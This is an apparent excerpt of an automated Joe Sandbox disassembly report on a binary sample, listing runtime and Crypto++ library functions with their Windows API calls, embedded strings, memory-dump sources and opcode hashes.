                                                                                                        • API ID: Base::Concurrency::details::$CancelContextScheduler$Collection$Base::_Concurrency::details::_CurrentDefaultFinishStateStealersTask
                                                                                                        • String ID:
                                                                                                        • API String ID: 218105897-0
                                                                                                        • Opcode ID: 1ab730b203937651ef122450f71a0a107b40cf19d47cea0b01753b3323a43e2d
                                                                                                        • Instruction ID: 165543a5ef5f7b7da7179c0114a4bf11ecb9443dc53384d1d068e4040cff2cc2
                                                                                                        • Opcode Fuzzy Hash: 1ab730b203937651ef122450f71a0a107b40cf19d47cea0b01753b3323a43e2d
                                                                                                        • Instruction Fuzzy Hash: 45F0A030200B108EE630AA689811F6A7BD9CF44310F40C899F41A8B2C2CB24E943CB46
                                                                                                        Function 00B029AD Relevance: 6.0, APIs: 4, Instructions: 29registryCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • RegisterWaitForSingleObject.KERNEL32(00B0896E,00B14A42,75EC5D89,00B14B42,000000FF,0000000C), ref: 00B029C4
                                                                                                        • GetLastError.KERNEL32(?,00B14B42,75EC5D89,00B14A42,00B0896E,?,?,?,?,00B0896E,?,?,?,?,00000000), ref: 00B029D3
                                                                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00B029E9
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00B029F7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 3803302727-0
                                                                                                        • Opcode ID: 58970478a8ae7f5ce155617712807a9f02350e8834d8cd4f3040b75d324051ff
                                                                                                        • Instruction ID: c475a27e44ca4e3337685fce9cc780d57d155051b62d60b395aa8d7d3cdfa625
                                                                                                        • Opcode Fuzzy Hash: 58970478a8ae7f5ce155617712807a9f02350e8834d8cd4f3040b75d324051ff
                                                                                                        • Instruction Fuzzy Hash: 10F08C3160020ABBCF00EFA08D0AFEF7BFCAB04745F500190B911E60E1DA34DA189BA0
                                                                                                        Function 00B026D2 Relevance: 6.0, APIs: 4, Instructions: 28COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ___crtCreateEventExW.LIBCPMT ref: 00B026E8
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00B01F19), ref: 00B026F6
                                                                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00B0270C
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00B0271A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                                                                        • String ID:
                                                                                                        • API String ID: 200240550-0
                                                                                                        • Opcode ID: e9c8e3f98206a71caa66539c87894ece7f2c97685baa2bd290ea84ef4e26c6fc
                                                                                                        • Instruction ID: 6934930b8a2426609fecf10a7bdd61838ab016d4cebcca6a84826a467ec512fe
                                                                                                        • Opcode Fuzzy Hash: e9c8e3f98206a71caa66539c87894ece7f2c97685baa2bd290ea84ef4e26c6fc
                                                                                                        • Instruction Fuzzy Hash: F8E0DF6264031A2AEB50B3768C0BFBB3AEC9B00B44F8408D0BA24E50D3FE64D90842A5
                                                                                                        Function 00B09665 Relevance: 6.0, APIs: 4, Instructions: 26memoryCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00B02AAE: TlsAlloc.KERNEL32(?,00B01F19), ref: 00B02AB4
                                                                                                        • TlsAlloc.KERNEL32(?,00B01F19), ref: 00B14E57
                                                                                                        • GetLastError.KERNEL32 ref: 00B14E69
                                                                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00B14E7F
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00B14E8D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                        • String ID:
                                                                                                        • API String ID: 3735082963-0
                                                                                                        • Opcode ID: 8d9c500e999dddacb6ace5498c74ac809eb892586536297d71763a6a83d50dcb
                                                                                                        • Instruction ID: 218121856ca73d398cd94047f04ffa70f00da6e14cba928e21981ff1c857f0bd
                                                                                                        • Opcode Fuzzy Hash: 8d9c500e999dddacb6ace5498c74ac809eb892586536297d71763a6a83d50dcb
                                                                                                        • Instruction Fuzzy Hash: 21E0D8715003056ACB14BB749D4E6FF37F8BA01755B900ED5B522E71F2EF34C48886A0
                                                                                                        Function 00B028E9 Relevance: 6.0, APIs: 4, Instructions: 24COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00B01F19), ref: 00B028F3
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00B01F19), ref: 00B02902
                                                                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00B02918
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00B02926
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                                                                        • String ID:
                                                                                                        • API String ID: 3016159387-0
                                                                                                        • Opcode ID: 3d56fc90425ba62c55963850ba41568ba9ef012431f7ef97d67ac8af9a437b98
                                                                                                        • Instruction ID: c4c8f48aa83cc04920a7fc001dc14884745a4c41bb98606c3e95abf987550c56
                                                                                                        • Opcode Fuzzy Hash: 3d56fc90425ba62c55963850ba41568ba9ef012431f7ef97d67ac8af9a437b98
                                                                                                        • Instruction Fuzzy Hash: EBE01A70A0024AAACB00EBB59E4AAEB77FCAA00745F5004E4A541E61A1EE24DA0887A4
                                                                                                        Function 00B02AAE Relevance: 6.0, APIs: 4, Instructions: 21memoryCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • TlsAlloc.KERNEL32(?,00B01F19), ref: 00B02AB4
                                                                                                        • GetLastError.KERNEL32 ref: 00B02AC1
                                                                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00B02AD7
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00B02AE5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                        • String ID:
                                                                                                        • API String ID: 3103352999-0
                                                                                                        • Opcode ID: 1411c803d8c71d17d5e5b2d0ef8192a624bf7005c42e841e906cc601b65e11d2
                                                                                                        • Instruction ID: a8b4cef97aa7af62501a562ea65176218bccf1b8732d25280dfe5f35d4733481
                                                                                                        • Opcode Fuzzy Hash: 1411c803d8c71d17d5e5b2d0ef8192a624bf7005c42e841e906cc601b65e11d2
                                                                                                        • Instruction Fuzzy Hash: A5E0C23060020966CB10B7748C1EBFF36ECEA00755BA00AD0F925D21F2EE64D8584AA4
                                                                                                        Function 00B2C88D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __startOneArgErrorHandling.LIBCMT ref: 00B2C91D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorHandling__start
                                                                                                        • String ID: pow
                                                                                                        • API String ID: 3213639722-2276729525
                                                                                                        • Opcode ID: 432e15333bd536871fcf6ed224cd5b5e1726ac604e4557ef7c32ad3581b0a5e3
                                                                                                        • Instruction ID: ba7a1baed8f2f60ef4681ad4ebecc247ec9aede95b02b9ba3e66f0164fd44ed4
                                                                                                        • Opcode Fuzzy Hash: 432e15333bd536871fcf6ed224cd5b5e1726ac604e4557ef7c32ad3581b0a5e3
                                                                                                        • Instruction Fuzzy Hash: 79515B61A1420586CB16BB18ED8137E3FE4DB40B50F308AD9F0D9462E9EB358CC19A87
                                                                                                        Function 00ABC430 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00ABC59D
                                                                                                        Strings
                                                                                                        • BlockPaddingScheme, xrefs: 00ABC52D
                                                                                                        • StreamTransformationFilter: please use AuthenticatedEncryptionFilter and AuthenticatedDecryptionFilter for AuthenticatedSymmetricCipher, xrefs: 00ABC577
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8Throw
                                                                                                        • String ID: BlockPaddingScheme$StreamTransformationFilter: please use AuthenticatedEncryptionFilter and AuthenticatedDecryptionFilter for AuthenticatedSymmetricCipher
                                                                                                        • API String ID: 2005118841-3582606076
                                                                                                        • Opcode ID: 0332f1f3497645d80e92f731b6b3e8c65d2e0774d3cff444804a67957b492e9f
                                                                                                        • Instruction ID: 26531b32b15488f5c1b79c2554faf2eff2b371f0ed5a3aac9a0575c04e79a0f3
                                                                                                        • Opcode Fuzzy Hash: 0332f1f3497645d80e92f731b6b3e8c65d2e0774d3cff444804a67957b492e9f
                                                                                                        • Instruction Fuzzy Hash: 0451C0B1A00749AFCB24DF64C955BDEBBF8FF05714F10419AE801AB392D7B1A908CB90
                                                                                                        Function 00B1A975 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00B1A99A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: EncodePointer
                                                                                                        • String ID: MOC$RCC
                                                                                                        • API String ID: 2118026453-2084237596
                                                                                                        • Opcode ID: 548cecea7ce40b4afde949bb929ce25608178f9cfd0ed76a2e1fb3657fca4d08
                                                                                                        • Instruction ID: 2cbeac05e034ceebddaa69a1b9eab55294548ce391f4282060c5702ef492921b
                                                                                                        • Opcode Fuzzy Hash: 548cecea7ce40b4afde949bb929ce25608178f9cfd0ed76a2e1fb3657fca4d08
                                                                                                        • Instruction Fuzzy Hash: 62413771901209AFCF15DF98C981AEEBBF5FF48300F598099F908A7251E335A990DB92
                                                                                                        Function 00B4205D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __dosmaperr_free
                                                                                                        • String ID: SystemRoot
                                                                                                        • API String ID: 3116789124-2034820756
                                                                                                        • Opcode ID: 26816a396a08b1608da1ed8a3902be071c414d4fed28aa2b952470df0a3dcdce
                                                                                                        • Instruction ID: af21b90b387a5ca079f66c10d38512c047c2b954186f4a91b3c3c26eb1bd3f5b
                                                                                                        • Opcode Fuzzy Hash: 26816a396a08b1608da1ed8a3902be071c414d4fed28aa2b952470df0a3dcdce
                                                                                                        • Instruction Fuzzy Hash: 25213A326042159FEB289F29DC51B79B7E5EFC6720F2981E9F8459B341C6329E01E790
                                                                                                        Function 00B3E369 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00B3E5C4,00000000,00000050,?,?,?,?,?), ref: 00B3E444
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ACP$OCP
                                                                                                        • API String ID: 0-711371036
                                                                                                        • Opcode ID: c9c35b24454aef4a4119ede3255ea59bf01c9e255e9fc91c1465743efebb10fe
                                                                                                        • Instruction ID: 92716c9c6b4e987fe2dddc0f009ab7e660aebc13f6f95936c17e3075ecd6c326
                                                                                                        • Opcode Fuzzy Hash: c9c35b24454aef4a4119ede3255ea59bf01c9e255e9fc91c1465743efebb10fe
                                                                                                        • Instruction Fuzzy Hash: D421A462A40101A6EB358A648942B9B73D6EB54B51F7A84E6F92AD73C1F732DD00C3A4
                                                                                                        Function 00A760C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00A7610E
                                                                                                          • Part of subcall function 00B17E0C: RaiseException.KERNEL32(?,?,00AE538C,?,?,Dflt,?,?,?,?,?,00AE538C,?,00B89978,?), ref: 00B17E6C
                                                                                                        • ___std_exception_copy.LIBVCRUNTIME ref: 00A76162
                                                                                                        Strings
                                                                                                        • Clone() is not implemented yet., xrefs: 00A760E5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionException@8RaiseThrow___std_exception_copy
                                                                                                        • String ID: Clone() is not implemented yet.
                                                                                                        • API String ID: 640887848-226299721
                                                                                                        • Opcode ID: ac14e4cafa46fc5e36d6cb0d8169ab0150f072624cadf2db515c4016b9c21f5b
                                                                                                        • Instruction ID: 481bc651075f1be7a5a003acb91cb51182a3197a6db17f5c5f5d378c2d2b82e0
                                                                                                        • Opcode Fuzzy Hash: ac14e4cafa46fc5e36d6cb0d8169ab0150f072624cadf2db515c4016b9c21f5b
                                                                                                        • Instruction Fuzzy Hash: B42141B2940609ABC701DF55C941F9AF7FCFB19710F5086AAE415A3790EB74AA14CBA0
                                                                                                        Function 00ABD5B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00ABD656
                                                                                                        Strings
                                                                                                        • OutputBuffer, xrefs: 00ABD5E7
                                                                                                        • ArraySink: missing OutputBuffer argument, xrefs: 00ABD62D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8Throw
                                                                                                        • String ID: ArraySink: missing OutputBuffer argument$OutputBuffer
                                                                                                        • API String ID: 2005118841-3781944848
                                                                                                        • Opcode ID: 99fe08689d6f88bf805da00f8ba09cc7bba2a24008b7e9f4885999fb314ceb62
                                                                                                        • Instruction ID: 381972c0009c77d63ea879fdb5365b34517902a4ea80357d9930c75a38ea05dc
                                                                                                        • Opcode Fuzzy Hash: 99fe08689d6f88bf805da00f8ba09cc7bba2a24008b7e9f4885999fb314ceb62
                                                                                                        • Instruction Fuzzy Hash: F1213B71904649AFCB14DF94C851FAEBBF8FB58710F0045AAE815AB6A0DB74A948CB90
                                                                                                        Function 00AE9EBA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SetLastError.KERNEL32(0000000D,?,00AE5230,00000001,?,00A7379A,00000000,?,00A72567,00B9F6C0,00AAE510,00B9F6EC,?,00A7379A,?,00000001), ref: 00AE9F3E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast
                                                                                                        • String ID: ios_base::failbit set
                                                                                                        • API String ID: 1452528299-3924258884
                                                                                                        • Opcode ID: befa06c357691b25796465ac71b38dbf30f6fe84f698b346b81febf9fe7ab59e
                                                                                                        • Instruction ID: 9b50b12835b613ae9010a609ad2b0bb598dc047b5cb913ee614ebea832f3ef6d
                                                                                                        • Opcode Fuzzy Hash: befa06c357691b25796465ac71b38dbf30f6fe84f698b346b81febf9fe7ab59e
                                                                                                        • Instruction Fuzzy Hash: 46113C32204355ABDF129F66DC8466FBBAABB48B55B014039FA09D7260DB709C509BD0
                                                                                                        Function 00AA01A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00AA021F
                                                                                                        Strings
                                                                                                        • StringSink: OutputStringPointer not specified, xrefs: 00AA01F6
                                                                                                        • OutputStringPointer, xrefs: 00AA01D2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
